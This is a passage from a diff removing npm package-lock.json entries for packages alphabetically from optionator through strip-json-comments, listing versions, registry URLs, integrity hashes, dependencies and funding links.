"^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/optionator": { - "version": "0.9.3", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.3.tgz", - "integrity": "sha512-JjCoypp+jKn1ttEFExxhetCKeJt9zhAgAve5FXHixTvFDW/5aEktX9bufBKLRRMdU7bNtpLfcGu94B3cdEJgjg==", - "dev": true, - "peer": true, - "dependencies": { - "@aashutoshrathi/word-wrap": "^1.2.3", - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0" - }, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", - "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", - "dev": true, - "peer": true, - "dependencies": { - "p-limit": "^3.0.2" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "node_modules/parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "dependencies": { - "callsites": "^3.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/path-scurry/node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, - "node_modules/path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "node_modules/picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pkg-dir/node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pkg-dir/node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pkg-dir/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/pkg-dir/node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "node_modules/punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/queue-microtask": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", - "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ], - "peer": true - }, - "node_modules/react-is": { - "version": "18.3.1", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", - "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-cwd/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/reusify": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", - "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", - "dev": true, - "peer": true, - "engines": { - "iojs": ">=1.0.0", - "node": ">=0.10.0" - } - }, - "node_modules/rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "node_modules/rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "dependencies": { - "glob": "^7.1.3" - }, - "bin": { - "rimraf": "bin.js" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/run-parallel": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", - "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ], - "peer": true, - "dependencies": { - "queue-microtask": "^1.2.2" - } - }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stack-utils/node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/string-width-cjs": { - "name": "string-width", - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi-cjs": { - "name": "strip-ansi", - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": 